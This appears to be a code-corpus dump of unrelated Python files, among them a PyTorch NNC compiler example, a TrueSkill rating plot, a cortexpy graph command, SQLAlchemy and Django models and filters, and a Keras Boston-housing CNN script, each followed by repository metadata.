# NNC time: 0.0066373348236083984
# PyTorch time 0.025979042053222656
# Static Runtime time 0.011004209518432617
#
# As we can see, NNC is nearly 2x faster than static runtime and more than 4x
# faster than PyTorch. This is not surprising, as we are dealing with extremely
# small tensors where framework overhead is a significant factor.
import time
import torch
import torch.nn as nn
import torch._C._te as te
import torch.fx as fx
from torch.fx import map_arg
from torch.fx.passes.shape_prop import ShapeProp
import operator
# Decomposition Pass
def binary_mapping(op):
def f(a, b):
return op(a, b)
return f
decomposition_rules = {}
binary_decompositions = [
(operator.matmul, torch.mm),
(operator.add, torch.add),
(operator.mul, torch.mul),
(operator.sub, torch.sub),
(operator.truediv, torch.div),
(operator.eq, torch.eq),
(operator.gt, torch.gt),
(operator.ge, torch.ge),
(operator.lt, torch.lt),
(operator.le, torch.le),
(operator.ne, torch.ne),
(operator.and_, torch.bitwise_and)
]
for old, new in binary_decompositions:
decomposition_rules[old] = binary_mapping(new)
def addmm_decompose(input, mat1, mat2, beta=1, alpha=1, out=None):
assert(out is None)
return beta*input + alpha*(torch.mm(mat1, mat2))
decomposition_rules[torch.addmm] = addmm_decompose
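# (Added illustration, not part of the original example.) The rule above rewrites
# addmm in terms of add/mul/mm, so for instance:
#   inp, m1, m2 = torch.randn(2, 2), torch.randn(2, 3), torch.randn(3, 2)
#   torch.allclose(torch.addmm(inp, m1, m2), addmm_decompose(inp, m1, m2))  # True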
def decompose(model: torch.nn.Module, example_inputs) -> torch.nn.Module:
"""
decompose(model, example_inputs) takes in a model, decomposes any of the functions in `decomposition_rules` to its constituent operations, and returns a `nn.Module` without any of the operations with decomposition rules.
"""
# Run it multiple times so we converge to a fixed point.
for _ in range(5):
model = fx.symbolic_trace(model)
ShapeProp(model).propagate(*example_inputs)
new_graph = fx.Graph()
env = {}
for node in model.graph.nodes:
if node.op == 'call_function' and node.target in decomposition_rules:
# If the current function is in `decomposition_rules`, we use
# `Proxy` objects to decompose the operations using the
# decomposition rule. See
# https://pytorch.org/docs/master/fx.html#proxy-retracing for
# more details.
proxy_args = map_arg(node.args, lambda n: fx.Proxy(env[n.name]))
proxy_kwargs = map_arg(node.kwargs, lambda n: fx.Proxy(env[n.name]))
new_node = decomposition_rules[node.target](*proxy_args, **proxy_kwargs).node
env[node.name] = new_node
else:
new_node = new_graph.node_copy(node, lambda x: env[x.name])
env[node.name] = new_node
model = fx.GraphModule(model, new_graph)
return model
# NNC Lowering Pass
class kernel_arena_scope(object):
def __enter__(self):
self.scope = te.KernelScope()
def __exit__(self, typ, val, traceback):
self.scope = None
def get_dim_args(dims):
dim_args = []
for dim in dims:
dim_args.append(te.DimArg(te.ExprHandle.int(dim), 'i' + str(len(dim_args))))
return dim_args
def to_expr(x):
if isinstance(x, int):
return te.ExprHandle.int(x)
elif isinstance(x, float):
return te.ExprHandle.float(x)
lowering_functions = {}
def wrap_compute(f):
def fn_lower(name, out_shape, inp_shapes, args):
X = te.Compute(name, get_dim_args(out_shape), f(inp_shapes, args))
return X
return fn_lower
def gen_unary_nnc(op):
def gen_op_nnc(inp_shapes, args):
def f(*idxs):
return op(args[0].load(idxs))
return f
return gen_op_nnc
unary_lowerings = [
(torch.sin, lambda x: x.sin()),
(torch.cos, lambda x: x.cos()),
(torch.tan, lambda x: x.tan()),
(torch.asin, lambda x: x.asin()),
(torch.acos, lambda x: x.acos()),
(torch.atan, lambda x: x.atan()),
(torch.sinh, lambda x: x.sinh()),
(torch.cosh, lambda x: x.cosh()),
(torch.tanh, lambda x: x.tanh()),
(torch.sigmoid, lambda x: x.sigmoid()),
(torch.exp, lambda x: x.exp()),
(torch.expm1, lambda x: x.expm1()),
(torch.expm1, lambda x: x.expm1()),
(torch.abs, lambda x: x.abs()),
(torch.log, lambda x: x.log()),
(torch.log2, lambda x: x.log2()),
(torch.log10, lambda x: x.log10()),
(torch.log1p, lambda x: x.log1p()),
(torch.erf, lambda x: x.erf()),
(torch.erfc, lambda x: x.erfc()),
(torch.sqrt, lambda x: x.sqrt()),
(torch.rsqrt, lambda x: x.rsqrt()),
(torch.ceil, lambda x: x.ceil()),
(torch.floor, lambda x: x.floor()),
(torch.round, lambda x: x.round()),
(torch.trunc, lambda x: x.trunc()),
(torch.lgamma, lambda x: x.lgamma()),
]
for torch_op, nnc_fn in unary_lowerings:
lowering_functions[torch_op] = wrap_compute(gen_unary_nnc(nnc_fn))
def gen_binary_nnc(op):
def is_nnc_obj(x):
return isinstance(x, te.Placeholder) or isinstance(x, te.Tensor)
def gen_op_nnc(inp_shapes, args):
if is_nnc_obj(args[0]) and is_nnc_obj(args[1]):
A_shape, A_dtype = inp_shapes[0]
B_shape, B_dtype = inp_shapes[1]
A, B = args
def index_or_broadcast(shape, *args):
out = []
for idx, arg in enumerate(args):
if idx >= len(shape): continue
if shape[idx] == 1:
out.append(to_expr(0))
else:
out.append(arg)
return out
def f(*idxs):
return op(A.load(index_or_broadcast(A_shape, *idxs)), B.load(index_or_broadcast(B_shape, *idxs)))
return f
else:
if is_nnc_obj(args[0]):
def f(*idxs):
return op(args[0].load(idxs), to_expr(args[1]))
return f
else:
def f(*idxs):
return op(to_expr(args[0]), args[1].load(idxs))
return f
return gen_op_nnc
binary_lowerings = [
(torch.add,lambda a, b: a+b),
(torch.mul,lambda a, b: a*b),
(torch.sub,lambda a, b: a-b),
(torch.div,lambda a, b: a/b),
(torch.eq,lambda a, b: a==b),
(torch.gt,lambda a, b: a>b),
(torch.lt,lambda a, b: a<b),
(torch.ge,lambda a, b: a>=b),
(torch.le,lambda a, b: a<=b),
]
for torch_op, nnc_fn in binary_lowerings:
lowering_functions[torch_op] = wrap_compute(gen_binary_nnc(nnc_fn))
def clamp_lower(inp_shapes, args):
def f(*idxs):
val = args[0].load(idxs)
return te.ifThenElse(val < to_expr(args[1]), to_expr(args[1]),
te.ifThenElse(val > to_expr(args[2]), to_expr(args[2]), val))
return f
lowering_functions[torch.clamp] = wrap_compute(clamp_lower)
def transpose_lower(name, out_shape, inp_shapes, args):
idx_1, idx_2 = args[1], args[2]
def transpose(shape):
shape[idx_1], shape[idx_2] = shape[idx_2], shape[idx_1]
return shape
def f(*idxs):
idxs = transpose(list(idxs))
return args[0].load(idxs)
return te.Compute(name, get_dim_args(out_shape), f)
def flatten_lower(name, out_shape, inp_shapes, args):
A, start_dim, end_dim = args
shape = list(inp_shapes[0][0])
flattened_region = shape[start_dim:end_dim+1]
def prod(x):
t = 1
for i in x:
t *= i
return t
def get_orig_idxs(i):
idxs = []
total = prod(flattened_region)
for dim in flattened_region:
total //= dim
idxs.append(i / to_expr(total))
i = i % to_expr(total)
return idxs
def f(*idxs):
idxs = list(idxs)
idxs = idxs[:start_dim] + get_orig_idxs(idxs[start_dim]) + idxs[start_dim+1:]
return A.load(idxs)
return te.Compute(name, get_dim_args(out_shape), f)
def cat_lower(name, out_shape, inp_shapes, args):
tensors = args[0]
dim = args[1]
lengths = [i[0][dim] for i in inp_shapes[0]]
def f(*idxs):
idxs = list(idxs)
sm = lengths[0]
load = tensors[0].load(idxs)
for length, tensor in list(zip(lengths, tensors))[1:]:
new_idxs = idxs[:]
new_idxs[dim] -= to_expr(sm)
load = te.ifThenElse(idxs[dim] < to_expr(sm), load, tensor.load(new_idxs))
return load
return te.Compute(name, get_dim_args(out_shape), f)
lowering_functions[torch.transpose] = transpose_lower
lowering_functions[torch.flatten] = flatten_lower
lowering_functions[torch.cat] = cat_lower
def bmm_lower(name, out_shape, inp_shapes, args):
M1 = args[0]
M2 = args[1]
B, N, M = inp_shapes[0][0]
P = inp_shapes[1][0][2]
def f(b, n, p, m):
return M1.load([b, n, m]) * M2.load([b, m, p])
mm = te.Compute('mm', get_dim_args([B,N,P,M]), f)
return te.Reduce(name, get_dim_args([B, N, P]), te.Sum(), mm, get_dim_args([M]))
def mm_lower(name, out_shape, inp_shapes, args):
M1 = args[0]
M2 = args[1]
N, M = inp_shapes[0][0]
P = inp_shapes[1][0][1]
def f(n, p, m):
return M1.load([n, m]) * M2.load([m, p])
mm = te.Compute('mm', get_dim_args([N,P,M]), f)
return te.Reduce(name, get_dim_args([N, P]), te.Sum(), mm, get_dim_args([M]))
lowering_functions[torch.bmm] = bmm_lower
lowering_functions[torch.mm] = mm_lower
def lower_function(node, op, nnc_args, args):
inp_shapes = fx.node.map_aggregate(args, lambda arg: (arg.shape, arg.dtype) if isinstance(arg, fx.Node) else None)
return lowering_functions[op](node.name, node.shape, inp_shapes, nnc_args)
def nnc_compile(model: torch.nn.Module, example_inputs) -> torch.nn.Module:
"""
nnc_compile(model, example_inputs) returns a function with the same args
as `model.forward`, with an extra argument corresponding to where the
output is stored. This function takes the inputs (which must be PyTorch
tensors with the same shapes as example_inputs), and passes them to an
NNC executor.
"""
fx_model = fx.symbolic_trace(model)
ShapeProp(fx_model).propagate(*example_inputs)
# This env maps from nodes to `te.ExprHandle`, which represent the output
# of an NNC computation.
env = {}
def get_te_shapes(node):
return [te.ExprHandle.int(i) for i in node.shape]
def get_nnc_type(dtype):
if dtype == torch.float:
return te.Dtype.Float
elif dtype == torch.long:
return te.Dtype.Long
else:
raise RuntimeError("nyi")
def get_te_type(node):
return get_nnc_type(node.dtype)
def gen_compute(args):
te_args = [env[arg.name] for arg in args]
def lookup_env(l):
return fx.node.map_aggregate(l, lambda x: env[x.name] if isinstance(x, fx.Node) else x)
def fetch_attr(target : str):
target_atoms = target.split('.')
attr_itr = fx_model
for i, atom in enumerate(target_atoms):
if not hasattr(attr_itr, atom):
raise RuntimeError(f"Node referenced nonexistant target {'.'.join(target_atoms[:i])}")
attr_itr = getattr(attr_itr, atom)
return attr_itr
outs = None
inputs = []
module_attrs = []
for node in fx_model.graph.nodes:
if node.op == 'placeholder':
# We simply map the input placeholder to a `te.Placeholder`, which
# also represents an input to the NNC computation.
shapes = get_te_shapes(node)
env[node.name] = te.Placeholder(node.name, get_te_type(node), shapes)
inputs.append(env[node.name])
elif node.op == 'call_function':
# This does the bulk of the work - we call `lower_function`, which
# returns a `te.ExprHandle` (the output of a NNC computation), and
# put it in our environment.
result = lower_function(node, node.target, lookup_env(node.args), node.args)
env[node.name] = result
elif node.op == 'output':
outs = list(lookup_env(node.args))
elif node.op == 'get_attr':
# As NNC doesn't have any concept of state, we pull out the module
# attributes and pass them in as inputs to NNC.
module_attrs.append(node)
shapes = get_te_shapes(node)
env[node.name] = te.Placeholder(node.name, get_te_type(node), shapes)
else:
raise RuntimeError("not yet implemented")
loopnest = te.LoopNest(outs)
loopnest.prepare_for_codegen()
stmt = te.simplify(loopnest.root_stmt())
cg = te.construct_codegen('llvm', stmt, [te.BufferArg(x) for x in [env[i.name] for i in module_attrs] + inputs + outs])
def f(inps):
module_stuff = [fetch_attr(i.target) for i in module_attrs]
cg.call(module_stuff + list(inps))
return f
################################
# Example usage and Benchmarking
################################
if __name__ == '__main__':
class DeepAndWide(torch.nn.Module):
def __init__(self, num_features=50):
super(DeepAndWide, self).__init__()
self.mu = torch.nn.Parameter(torch.randn(1, num_features))
self.sigma = torch.nn.Parameter(torch.randn(1, num_features))
self.fc_w = torch.nn.Parameter(torch.randn(1, num_features + 1))
self.fc_b = torch.nn.Parameter(torch.randn(1))
def forward(self, ad_emb_packed, user_emb, wide):
wide_offset = wide + self.mu
wide_normalized = wide_offset * self.sigma
wide_preproc = torch.clamp(wide_normalized, 0., 10.)
user_emb_t = torch.transpose(user_emb, 1, 2)
dp_unflatten = torch.bmm(ad_emb_packed, user_emb_t)
dp = torch.flatten(dp_unflatten, 1, -1)
inp = torch.cat([dp, wide_preproc], 1)
t1 = torch.transpose(self.fc_w, 1, 0)
fc1 = torch.addmm(self.fc_b, inp, t1)
return fc1
with kernel_arena_scope():
with torch.no_grad():
num_features = 50
mod = DeepAndWide(num_features)
# Phabricate sample inputs
batch_size = 1
embedding_size = 32
ad_emb_packed = torch.randn(batch_size, 1, embedding_size)
user_emb = torch.randn(batch_size, 1, embedding_size)
wide = torch.randn(batch_size, num_features)
inps = (ad_emb_packed, user_emb, wide)
out = torch.empty(batch_size, 1)
mod = decompose(mod, inps)
cg = nnc_compile(mod, inps)
iters = 1000
for _ in range(10):
cg([ad_emb_packed, user_emb,wide, out])
begin = time.time()
for _ in range(iters):
cg([ad_emb_packed, user_emb,wide, out])
print("NNC time: ", time.time()-begin)
mod_jit = torch.jit.script(DeepAndWide(num_features))
for _ in range(10):
mod_jit(ad_emb_packed, user_emb,wide)
begin = time.time()
for _ in range(iters):
mod_jit(ad_emb_packed, user_emb,wide)
print("PyTorch time", time.time()-begin)
static_runtime = torch._C._jit_to_static_runtime(mod_jit._c)
for _ in range(10):
static_runtime.run([ad_emb_packed, user_emb,wide])
begin = time.time()
for _ in range(iters):
static_runtime.run([ad_emb_packed, user_emb,wide])
print("Static Runtime time", time.time()-begin)
print("Sums:", out.sum(), mod(*inps).sum())
|
[
"horacehe2007@yahoo.com"
] |
horacehe2007@yahoo.com
|
891868a38e89c658e7a8d4f0a2248f793626814f
|
a11bd8615f47c15fb52cd83fe7722309f250537d
|
/pytgf/game/turnbased/tb_mainloop.py
|
a0a157cd86eef1b1af64b551ad569c2e59f90f6d
|
[] |
no_license
|
Angeall/pyTGF
|
75a0abfc6605f08c93181248bd529279c01b05bc
|
463359a6596598c0c6cceb6e30f393d77eca0a89
|
refs/heads/master
| 2021-01-12T12:21:10.659708
| 2018-09-02T12:37:58
| 2018-09-02T12:37:58
| 72,452,959
| 0
| 0
| null | 2017-05-28T11:41:09
| 2016-10-31T16:00:45
|
Python
|
UTF-8
|
Python
| false
| false
| 959
|
py
|
from typing import List
from .tb_api import TurnBasedAPI
from ..mainloop import MainLoop
from ...characters.moves import MoveDescriptor
from ...characters.units import Unit
from ...controls.wrappers import ControllerWrapper
class TurnBasedMainLoop(MainLoop):
def __init__(self, api: TurnBasedAPI):
super().__init__(api)
def _reactToFinishedMove(self):
self.api.switchToNextPlayer()
self._currentTurnTaken = False
def _getPlayerNumbersToWhichSendEvents(self) -> List[int]:
return [self.api.getNextPlayer()]
def _mustRetrieveNextMove(self, current_wrapper: ControllerWrapper) -> bool:
# TODO -- LAP !
return self.api.isCurrentPlayer(current_wrapper.controller.playerNumber) and not self._currentTurnTaken
def _mustSendInitialWakeEvent(self, initial_action: MoveDescriptor, unit: Unit) -> bool:
return initial_action is None and unit.playerNumber == self.api.getCurrentPlayer()
|
[
"angeal1105@gmail.com"
] |
angeal1105@gmail.com
|
d71bcb821a1117a890833605c7e796bacff6f3be
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/flask-mail-labs/.venv/lib/python2.7/site-packages/sqlalchemy/databases/__init__.py
|
05161c069c5486ac7c098a9893e2648a77b30f32
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 979
|
py
|
# databases/__init__.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Include imports from the sqlalchemy.dialects package for backwards
compatibility with pre 0.6 versions.
"""
from ..dialects.sqlite import base as sqlite
from ..dialects.postgresql import base as postgresql
postgres = postgresql
from ..dialects.mysql import base as mysql
from ..dialects.drizzle import base as drizzle
from ..dialects.oracle import base as oracle
from ..dialects.firebird import base as firebird
from ..dialects.informix import base as informix
from ..dialects.mssql import base as mssql
from ..dialects.sybase import base as sybase
__all__ = (
'drizzle',
'firebird',
'informix',
'mssql',
'mysql',
'postgresql',
'sqlite',
'oracle',
'sybase',
)
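# (Added note, not part of the original shim.) With this module in place, pre-0.6
# style imports such as "from sqlalchemy.databases import mysql" keep working and
# resolve to sqlalchemy.dialects.mysql.base.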
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
1efc690b062f0b48f50f0a1c1b6619f5c024c81e
|
cc6e36ce306a46c1accc3e979362de34b6063b7e
|
/stats/plots.py
|
1b266a8acc502da245aada68b8a7854e5d440dca
|
[] |
no_license
|
bartromgens/petanque-stats-server
|
d51995e2b4d288a0a99563347c3bf3db863918bf
|
9f7e48a7670b1c2c89f1bfcb2ac5ed8c8e9a7fe0
|
refs/heads/master
| 2020-03-22T19:23:18.230361
| 2018-07-29T00:46:02
| 2018-07-29T00:46:02
| 140,524,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,360
|
py
|
from matplotlib import pyplot
import numpy
import trueskill
def plot_rating_history(rankings_history, show_range=True, begin=0):
fig = pyplot.figure(figsize=(10, 6))
ax = fig.add_subplot(111)
player_rankings = {}
for rankings in rankings_history:
for player, ranking in rankings.items():
if player == 'admin':
continue
if player not in player_rankings:
player_rankings[player] = {}
player_rankings[player]['mu'] = []
player_rankings[player]['sigma'] = []
# if len(player_rankings[player]['mu']) > 0 and player_rankings[player]['mu'][-1] == ranking.mu:
# continue
player_rankings[player]['mu'].append(ranking.mu - trueskill.MU)
player_rankings[player]['sigma'].append(ranking.sigma)
for player, y in player_rankings.items():
# if len(y['mu']) < 10:
# continue
mu = numpy.array(y['mu'])[begin:]
sigma = numpy.array(y['sigma'])[begin:]
t = numpy.arange(len(mu))
ax.plot(mu, label=player, lw=2)
if show_range:
ax.fill_between(t, mu - sigma/6, mu + sigma/6, alpha=0.15)
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, loc='upper left')
fig.tight_layout()
fig.savefig('test.png')
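# (Added usage sketch, not part of the original module.) Assumes rankings_history is a
# list of {player_name: trueskill.Rating} snapshots, one per game, which matches how mu
# and sigma are read above; the figure is written to test.png.
#   import trueskill
#   history = [{'alice': trueskill.Rating()}, {'alice': trueskill.Rating(mu=26)}]
#   plot_rating_history(history, show_range=True)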
|
[
"bart.romgens@gmail.com"
] |
bart.romgens@gmail.com
|
4b55c81124dc2f1689fa1674157111ca708a47c2
|
8aac3ae9588ca4accd87eaaf0a7517edc3efc1b5
|
/src/cortexpy/command/subgraph.py
|
4dfea3d6e9db0e3cc1e1b796a38e58ff3e75393f
|
[
"Apache-2.0"
] |
permissive
|
winni2k/cortexpy
|
453cf7e1b764494c65b1d87622fd7a5007f6ba30
|
7156d2872b0d5fe94b072201a094b5fc5acc384b
|
refs/heads/master
| 2021-01-23T16:21:28.526647
| 2020-03-15T09:11:37
| 2020-03-15T09:11:37
| 102,736,885
| 2
| 1
|
Apache-2.0
| 2020-03-15T09:11:39
| 2017-09-07T12:54:59
|
Python
|
UTF-8
|
Python
| false
| false
| 4,576
|
py
|
def subgraph(argv):
import argparse
from .shared import get_shared_argparse
import cortexpy.constants
shared_parser = get_shared_argparse()
parser = argparse.ArgumentParser(
'cortexpy subgraph', parents=[shared_parser],
description="""
Find all subgraphs from every k-mer in an initial contig.
Input and output are cortex graphs.
"""
)
parser.add_argument('initial_contig', help="Initial contig from which to start traversal")
parser.add_argument('--graphs', nargs='+',
required=True,
help="Input cortexpy graphs."
" Multiple graphs can be specified and are joined on-the-fly.")
parser.add_argument('--orientation',
type=cortexpy.constants.EngineTraversalOrientation,
choices=[o.name for o in cortexpy.constants.EngineTraversalOrientation],
default=cortexpy.constants.EngineTraversalOrientation.both,
help='Traversal orientation')
parser.add_argument('-c', '--colors',
nargs='+',
type=int,
help="""Colors to traverse. May take multiple color numbers separated by
a space. The traverser will follow all colors
specified. Will follow all colors if not specified.
""", default=None)
parser.add_argument('--initial-fasta', action='store_true',
help='Treat initial_contig as a file in FASTA format')
parser.add_argument('--max-nodes', type=int, default=None,
help='Maximum number of nodes to traverse (int).'
' Die without output if max nodes is exceeded')
parser.add_argument('--logging-interval', type=int, default=90,
help='Logging interval. [default: %(default)s]')
parser.add_argument('--cache-size', type=int, default=0, help='Number of kmers to cache')
parser.add_argument('--binary-search-cache-size', type=int, default=0,
help='Number of kmers to cache for binary search')
parser.add_argument('--slurp', action='store_true',
help='Slurp all cortex graphs before traversal')
args = parser.parse_args(argv)
from cortexpy.logging_config import configure_logging_from_args_and_get_logger
logger = configure_logging_from_args_and_get_logger(args, 'cortexpy.traverse')
import sys
from cortexpy.graph.serializer.kmer import dump_colored_de_bruijn_graph_to_cortex
from cortexpy.graph.parser.random_access_collection import RandomAccessCollection
from cortexpy.constants import EngineTraversalOrientation
from cortexpy.graph.traversal.engine import Engine
from contextlib import ExitStack
with ExitStack() as stack:
if args.out == '-':
output = sys.stdout.buffer
else:
output = stack.enter_context(open(args.out, 'wb'))
if args.slurp:
from cortexpy.graph.parser.random_access import SlurpedRandomAccess
RAClass = SlurpedRandomAccess.from_handle
logger.info("Slurping cortex graphs")
else:
from cortexpy.graph.parser.random_access import RandomAccess as RAClass
if len(args.graphs) == 1:
ra_parser = RAClass(
stack.enter_context(open(args.graphs[0], 'rb')),
kmer_cache_size=args.cache_size
)
else:
ra_parser = RandomAccessCollection(
[RAClass(stack.enter_context(open(graph_path, 'rb')),
kmer_cache_size=args.cache_size)
for graph_path in args.graphs])
engine = Engine(
ra_parser,
orientation=EngineTraversalOrientation[args.orientation.name],
max_nodes=args.max_nodes,
logging_interval=args.logging_interval
)
if args.colors is not None:
engine.traversal_colors = args.colors
else:
engine.traversal_colors = tuple(list(range(engine.ra_parser.num_colors)))
logger.info('Traversing colors: ' + ','.join([str(c) for c in engine.traversal_colors]))
if args.initial_fasta:
engine.traverse_from_each_kmer_in_fasta(args.initial_contig)
else:
engine.traverse_from_each_kmer_in(args.initial_contig)
dump_colored_de_bruijn_graph_to_cortex(engine.graph, output)
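# (Added usage sketch, not part of the original module.) A typical invocation, assuming
# the shared parser from get_shared_argparse provides the --out option that args.out
# refers to above:
#   cortexpy subgraph ACGTACGTACGT --graphs sample.ctx --colors 0 --out subgraph.ctx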
|
[
"wkretzsch@gmail.com"
] |
wkretzsch@gmail.com
|
382da2a224bb2008b005eaaf62f525a7c7336e1f
|
5d0b026aeba72c828f4a7431f232144263247d37
|
/todo/models.py
|
12a8d8872e188a59596e4510fbd80d00e0ee106a
|
[] |
no_license
|
thewolfcommander/todo-fastapi
|
b4189628a617326f3574a402c21c4dea95dbb6eb
|
95e4c2fd841418eb93499d70aa934f22d28d2b2d
|
refs/heads/main
| 2023-01-01T22:09:46.155199
| 2020-10-20T01:39:22
| 2020-10-20T01:39:22
| 305,527,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
from datetime import datetime
from sqlalchemy import (
Column,
Integer,
String,
Boolean,
DateTime
)
from todo.database import Base
class Todo(Base):
"""
Model for handling Todos
"""
__tablename__ = "todos"
id = Column(Integer, index=True, primary_key=True)
title = Column(String(255), index=True)
description = Column(String)
added = Column(DateTime, default=datetime.now)
updated = Column(DateTime, default=datetime.now)
status = Column(String(50))
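# (Added usage sketch; assumes todo.database also exposes an engine and a session
# factory, which are not shown here.)
#   Base.metadata.create_all(bind=engine)
#   session.add(Todo(title="Write docs", description="First draft", status="open"))
#   session.commit()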
|
[
"tyagimanojtyagi.22@gmail.com"
] |
tyagimanojtyagi.22@gmail.com
|
fcdc3aa3d46bf734f91c559e161d9bdb3146197f
|
7bef4bbdd6e35b34726f30997c2f42f72e45ceb8
|
/day6/day6-2.py
|
8ac169f332a21f63d2cb1c7654d2eadab21ec0bc
|
[] |
no_license
|
paulbombarde/AdventOfCode2020
|
dfe1ad2a16d13282b7952b05b5be778303476eaa
|
0635d19ba3ae955a582989edb457b125e68f3438
|
refs/heads/main
| 2023-02-07T13:18:20.274183
| 2020-12-29T18:32:27
| 2020-12-29T18:32:27
| 321,311,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
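# (Added summary, not in the original file.) Advent of Code 2020, day 6 part 2: for each
# blank-line-separated group, count the questions that every person in the group answered
# and sum those counts; the block after the loop applies the same count to the final
# group in case the input does not end with a blank line.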
import sys
from collections import defaultdict
with open(sys.argv[1]) as input :
count = 0
group = defaultdict(int)
gl = []
for l in input :
l = l.rstrip()
if len(l) == 0 :
for k,v in group.items() :
if v == len(gl) :
count += 1
print(gl,group, count)
group.clear()
gl.clear()
else:
for c in l :
group[c] += 1
gl.append(l)
for k,v in group.items() :
if v == len(gl) :
count += 1
print(gl,group, count)
|
[
"p.bombarde@WIN-19-020"
] |
p.bombarde@WIN-19-020
|
27c2a4c36af024fcbcc6e43301976a3c576c4eb3
|
3b5a2a4df578adaa7640498661232a88710db436
|
/Python/Veri Yapıları-Temel Kavramlar/Print Metodu.py
|
beac27dbf8a3185b87babc045911fc3179f1e200
|
[] |
no_license
|
mertsigirci11/Python-Calismalari
|
ba87b87503cb8b1e924fd0534d0000fc27019a45
|
167c3e3e54049491b02a0cacba1f4c2c55508ff7
|
refs/heads/main
| 2023-06-30T08:28:01.141643
| 2021-07-30T11:24:24
| 2021-07-30T11:24:24
| 391,038,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
"""
---------PRİNT METODU KULLANIMI--------------
"""
print("Hello","AI","ERA")
print("Geleceği Yazanlar", "Turkcell",sep="_")
# The sep argument fills the gap between the printed strings with the given separator instead of the default space.
print("Geleceği Yazanlar", "Turkcell",end="_")
# The end argument appends the given string to the end of the output instead of the default newline.
|
[
"noreply@github.com"
] |
mertsigirci11.noreply@github.com
|
e86f7c2044372927e6cdca345b722fefe2dfdb3c
|
be85440729998fb00690202222eda56c19d79f70
|
/django_school/classroom/filters.py
|
282e81aa99364ad576f8bc5f61e5bd9b51cb44fd
|
[] |
no_license
|
HamdaniFatima/PlateformeCapMat
|
7b8309093c0b19d5e26231df92b8b2c34343f27b
|
cc02b61d55c4b0c1b3e3619e483445e485c91f5f
|
refs/heads/master
| 2022-05-22T04:02:05.846943
| 2020-04-27T12:45:39
| 2020-04-27T12:45:39
| 259,312,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
import django_filters
from classroom.models import Quiz, Profile, Student, Capteur
class CasesFilter (django_filters.FilterSet):
class Meta:
model = Quiz
fields = [ 'subject',]
class ExpertsFilter (django_filters.FilterSet):
class Meta:
model = Student
fields = ['interests', 'domaine']
class CapteurFilter (django_filters.FilterSet):
class Meta:
model = Capteur
fields = [ 'subject', 'domaine', 'technologie_utilisee', 'type_evt' ]
|
[
"hanane33hanine@gmail.com"
] |
hanane33hanine@gmail.com
|
816bd2586090e45edac82d0f677783087078bcb2
|
c443a7cd3a4c2ea3be746a5cfd343d59a555cff9
|
/boston/original_boston.py
|
beb469d215548f386039492b39280fe153bc8f98
|
[] |
no_license
|
woshidandan/fnnmOS_ELM
|
0dacf1944235924aa5fbe174f8c29a6314989615
|
0eb6a5000854284fe050a6ff7001aa93b03c1381
|
refs/heads/master
| 2021-08-15T18:15:35.985541
| 2020-05-12T03:10:53
| 2020-05-12T03:10:53
| 178,802,233
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,733
|
py
|
from keras.datasets import boston_housing
from keras.models import Sequential
from keras.layers import Dense,BatchNormalization,Dropout,Reshape,Flatten
from keras.layers.convolutional import Conv2D,MaxPooling2D,Conv1D,MaxPooling1D
import numpy as np
import os
import keras
import tensorflow as tf
from model import OSELM
import numpy as np
from keras.engine import Model
model_name = 'boston.h5'
(x_train, y_train), (x_test, y_test) = boston_housing.load_data()
print(x_train.shape)
# y_train = keras.utils.to_categorical(y_train, 1)
print(y_train.shape)
model = Sequential(name='boston')
model.add(BatchNormalization(input_shape=(13,)))
model.add(Reshape((13, 1,1)))
model.add(Conv2D(filters=13, strides=1, padding='same', kernel_size=1, activation='sigmoid'))
model.add(Conv2D(filters=26, strides=2, padding='same', kernel_size=2, activation='sigmoid'))
model.add(MaxPooling2D(pool_size=2, strides=1, padding='same'))
model.add(Conv2D(filters=52, strides=1, padding='same', kernel_size=1, activation='sigmoid'))
model.add(Conv2D(filters=104, strides=2, padding='same', kernel_size=2, activation='sigmoid'))
model.add(MaxPooling2D(pool_size=2, strides=1, padding='same'))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(1))
# model.load_weights(model_name)
model.compile('adam','mae',metrics=['accuracy'])
model.summary()
history=model.fit(x_train,y_train,batch_size=404,epochs=10000,verbose=1,validation_data=(x_test,y_test))
# model.save(model_name)
print(history.history)
print("acc:{},loss:{}".format(history.history['acc'],history.history['loss']))
# f=open("result.txt",'a')
# f.write(str(history.history['val_loss'][-1])+"\n")
# f.close()
#
# def hidden_layer_generate(model):
#
# """
# Build a model that extracts the output of the CNN's intermediate (hidden) layer
# :param cnn_model: CNN model
# :return:
# """
#
# layer_name = 'dense_1'
# hidden_layer_model = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
#
# cnn_train_result = hidden_layer_model.predict(x_train)
# cnn_test_result = hidden_layer_model.predict(x_test)
# return hidden_layer_model, cnn_train_result, cnn_test_result
#
#
#
# hidden_num = 1
# ###
# batch_size = 20
# ###
#
#
# tf.set_random_seed(2016)  # makes the random sequence reproducible
# sess = tf.Session()
# # while(hidden_num < 700):
# elm = OSELM(sess, batch_size, 1, hidden_num, 1)
# #
# # data_train_2d, data_test_2d, target_train, target_test = load_mnist_2d()
# # # print(target_train.shape) 1203
# # cnn_model = cnn_generate(data_train_2d, target_train)
#
# hidden_layer_model, cnn_train_result, cnn_test_result= hidden_layer_generate(model)
# # print(cnn_train_result.shape)
# # print("cnn_train_result") #(42500, 10)
# # print(cnn_train_result.shape)
#
#
#
# epoch = 0
# data_container = []
# target_container = []
# # target_train_convert = Y_train
# # print("Y_train") (42500, 10)
